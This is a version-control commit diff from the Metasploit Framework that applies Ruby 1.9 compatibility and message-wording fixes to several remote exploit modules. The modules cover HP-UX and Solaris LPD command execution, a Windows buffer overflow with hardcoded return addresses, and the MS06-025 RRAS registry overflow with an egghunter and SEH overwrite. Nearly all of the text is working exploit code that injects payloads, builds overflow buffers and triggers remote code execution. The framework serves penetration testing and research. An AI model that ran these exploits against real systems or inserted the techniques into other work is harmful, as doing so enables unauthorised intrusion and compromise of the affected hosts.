1.9 compatibility fixes for lpd exploits, clarification in the print messages that we are *trying* to exploit something, not absolutely doing so
git-svn-id: file:///home/svn/framework3/trunk@8916 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
6d606a7587
commit
22cb5a6bea
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HP-UX LPD Command Execution',
|
||||
'Description' => %q{
|
||||
This exploit abuses an unpublished vulnerability in the
|
||||
|
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
target. This vulnerability was silently patched with the
|
||||
buffer overflow flaws addressed in HP Security Bulletin
|
||||
HPSBUX0208-213.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
|
@ -53,13 +53,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515)
|
||||
|
@ -73,36 +73,37 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Connect to the LPD service
|
||||
connect
|
||||
|
||||
|
||||
print_status("Sending our job request with embedded command string...")
|
||||
# Send the job request with the encoded command
|
||||
sock.put(
|
||||
"\x02" + rand_text_alphanumeric(3) + jid +
|
||||
"`" + payload.encoded + "`\n"
|
||||
)
|
||||
|
||||
|
||||
res = sock.get_once(1)
|
||||
if (res[0] != 0)
|
||||
if !(res and res[0,1] == "\x00")
|
||||
print_status("The target did not accept our job request")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Sending our fake control file...")
|
||||
print_status("Sending our fake control file...")
|
||||
sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
|
||||
res = sock.get_once(1)
|
||||
if (res[0] != 0)
|
||||
if !(res and res[0,1] == "\x00")
|
||||
print_status("The target did not accept our control file")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Forcing an error and hijacking the cleanup routine...")
|
||||
|
||||
|
||||
begin
|
||||
sock.put(rand_text_alphanumeric(16384))
|
||||
disconnect
|
||||
rescue
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Solaris LPD Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution flaw in
|
||||
|
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
up to and including 8.0. This module uses a technique
|
||||
discovered by Dino Dai Zovi to exploit the flaw without
|
||||
needing to know the resolved name of the attacking system.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm', 'ddz' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -50,14 +50,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DisclosureDate' => 'Aug 31 2001',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515)
|
||||
|
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# This is the temporary path created in the spool directory
|
||||
spath = "/var/spool/print"
|
||||
|
||||
|
||||
# The job ID is squashed down to three decimal digits
|
||||
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
|
||||
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
|
||||
"f"+"dfA"+jid+"config\n"+
|
||||
"f"+"dfA"+jid+"script\n"
|
||||
|
||||
|
||||
|
||||
# The mail configuration file
|
||||
mailcf =
|
||||
|
@ -102,10 +102,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"\n"+
|
||||
"Mlocal P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
|
||||
"Mprog P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"
|
||||
|
||||
|
||||
# Establish the first connection to the server
|
||||
sock1 = connect(false)
|
||||
|
||||
|
||||
# Request a cascaded job
|
||||
sock1.put("\x02metasploit:framework\n")
|
||||
res = sock1.get_once
|
||||
|
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("The target did not accept our job request command")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Configuring the spool directory...")
|
||||
if !(
|
||||
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
|
||||
|
@ -123,19 +123,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock1.close
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
# Establish the second connection to the server
|
||||
sock2 = connect(false)
|
||||
|
||||
|
||||
# Request another cascaded job
|
||||
sock2.put("\x02localhost:metasploit\n")
|
||||
res = sock2.get_once
|
||||
if (not res)
|
||||
print_status("The target did not accept our second job request command")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Triggering the vulnerable call to the mail program...")
|
||||
end
|
||||
|
||||
print_status("Attempting to trigger the vulnerable call to the mail program...")
|
||||
if !(
|
||||
send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
|
||||
send_file(sock2, 3, "dfa" + jid + "config", mailcf)
|
||||
|
@ -143,36 +143,37 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock1.close
|
||||
sock2.close
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
sock1.close
|
||||
sock2.close
|
||||
|
||||
|
||||
print_status("Waiting up to 60 seconds for the payload to execute...")
|
||||
sleep(60)
|
||||
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
def send_file(s, type, name, data='')
|
||||
|
||||
|
||||
s.put(type.chr + data.length.to_s + " " + name + "\n")
|
||||
res = s.get_once(1)
|
||||
if !(res and res[0] == ?\0)
|
||||
if !(res and res[0,1] == "\x00")
|
||||
print_status("The target did not accept our control file command (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
s.put(data)
|
||||
s.put("\x00")
|
||||
res = s.get_once(1)
|
||||
if !(res and res[0] == ?\0)
|
||||
if !(res and res[0,1] == "\x00")
|
||||
print_status("The target did not accept our control file data (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2005-1009'],
|
||||
['OSVDB', '15234'],
|
||||
|
@ -44,8 +44,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
|
||||
['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
|
||||
['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
|
||||
['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
|
||||
],
|
||||
|
||||
'Privileged' => false,
|
||||
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
connect
|
||||
|
||||
hname = "METASPLOIT"
|
||||
probe =
|
||||
probe =
|
||||
"\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
|
||||
"\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
|
||||
"\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
|
||||
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
head =
|
||||
head =
|
||||
"\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
|
||||
"\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
|
||||
"\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
|
||||
|
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sent = 0
|
||||
try = 0
|
||||
|
||||
15.times {
|
||||
15.times {
|
||||
try += 1
|
||||
connect
|
||||
sent = sock.put(pattern)
|
||||
|
@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Overflow request sent, sleeping fo four seconds (#{try} tries)")
|
||||
sleep(4)
|
||||
|
||||
print_status("Triggering memory overwrite by reconnecting...")
|
||||
print_status("Attempting to trigger memory overwrite by reconnecting...")
|
||||
|
||||
begin
|
||||
10.times { |x|
|
||||
|
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Waiting for payload to execute...")
|
||||
|
||||
handler
|
||||
disconnect
|
||||
disconnect
|
||||
end
|
||||
|
||||
def wfs_delay
|
||||
|
@ -162,3 +162,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -21,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::SMB
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft RRAS Service RASMAN Registry Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a registry-based stack overflow in the Windows Routing
|
||||
and Remote Access Service. Since the service is hosted inside svchost.exe,
|
||||
a failed exploit attempt can cause other system services to fail as well.
|
||||
A valid username and password is required to exploit this flaw on Windows 2000.
|
||||
This module exploits a registry-based stack overflow in the Windows Routing
|
||||
and Remote Access Service. Since the service is hosted inside svchost.exe,
|
||||
a failed exploit attempt can cause other system services to fail as well.
|
||||
A valid username and password is required to exploit this flaw on Windows 2000.
|
||||
When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
|
||||
Exploiting this flaw involves two distinct steps - creating the registry key
|
||||
and then triggering an overwrite based on a read of this key. Once the key is
|
||||
|
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'CVE', '2006-2370' ],
|
||||
[ 'OSVDB', '26437' ],
|
||||
[ 'BID', '18325' ],
|
||||
[ 'MSB', 'MS06-025' ]
|
||||
[ 'MSB', 'MS06-025' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
|
@ -58,22 +58,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Post authentication bugs are rarely useful during automation
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
connect()
|
||||
smb_login()
|
||||
|
@ -82,46 +82,46 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Generate the egghunter payload
|
||||
hunter = generate_egghunter()
|
||||
egg = hunter[1]
|
||||
|
||||
|
||||
# Pick a "filler" character that we know doesn't get mangled
|
||||
# by the wide string conversion routines
|
||||
# by the wide string conversion routines
|
||||
filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
|
||||
fil = filset[ rand(filset.length) ].chr
|
||||
|
||||
|
||||
# Bind to the actual DCERPC interface
|
||||
handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
|
||||
print_status("Binding to #{handle}")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle}")
|
||||
|
||||
# Add giant blocks of guard data before and after the egg
|
||||
eggdata =
|
||||
# Add giant blocks of guard data before and after the egg
|
||||
eggdata =
|
||||
fil * 1024 +
|
||||
egg +
|
||||
egg +
|
||||
payload.encoded +
|
||||
egg +
|
||||
egg +
|
||||
payload.encoded +
|
||||
fil * 1024
|
||||
|
||||
|
||||
# Place the egghunter where ESI happens to point
|
||||
bof = (fil * 178)
|
||||
bof[84, hunter[0].length] = hunter[0]
|
||||
|
||||
|
||||
# Overwrite the SEH ptr, even though ESP is smashed
|
||||
# The handle after the ret must be an invalid address
|
||||
pat =
|
||||
(fil * 886) +
|
||||
NDR.long(target.ret) +
|
||||
pat =
|
||||
(fil * 886) +
|
||||
NDR.long(target.ret) +
|
||||
(fil * 3) + "\xc0" +
|
||||
bof
|
||||
|
||||
type2 =
|
||||
|
||||
type2 =
|
||||
NDR.string( (fil * 1024) + "\x00" ) +
|
||||
NDR.string( pat + "\x00" ) +
|
||||
NDR.string( (fil * 4096) + "\x00" ) +
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.long(rand(0xffffffff))
|
||||
|
||||
type1 =
|
||||
NDR.long(rand(0xffffffff))
|
||||
|
||||
type1 =
|
||||
NDR.long(rand(0xffffffff)) + # OperatorDial
|
||||
NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
|
||||
NDR.long(rand(0xffffffff)) + # UseLocation
|
||||
|
@ -156,24 +156,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
NDR.long(rand(0xffffffff)) +
|
||||
|
||||
NDR.string("\x00" * 514) +
|
||||
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.long(rand(0xffffffff))
|
||||
|
||||
stubdata =
|
||||
type1 +
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.long(rand(0xffffffff))
|
||||
|
||||
stubdata =
|
||||
type1 +
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
eggdata
|
||||
|
||||
|
||||
print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
|
||||
|
||||
begin
|
||||
print_status('Creating the malicious registry key...')
|
||||
response = dcerpc.call(0xA, stubdata)
|
||||
|
||||
print_status('Triggering the base pointer overwrite...')
|
||||
|
||||
print_status('Attempting to trigger the base pointer overwrite...')
|
||||
response = dcerpc.call(0xA, stubdata)
|
||||
|
||||
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
end
|
||||
|
||||
|
@ -182,3 +182,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -927,7 +927,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
NDR.long(0)
|
||||
|
||||
begin
|
||||
print_status("Triggering the vulnerability...")
|
||||
print_status("Attempting to trigger the vulnerability...")
|
||||
dcerpc.call(0x1f, stub)
|
||||
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
|
|
Loading…
Reference in New Issue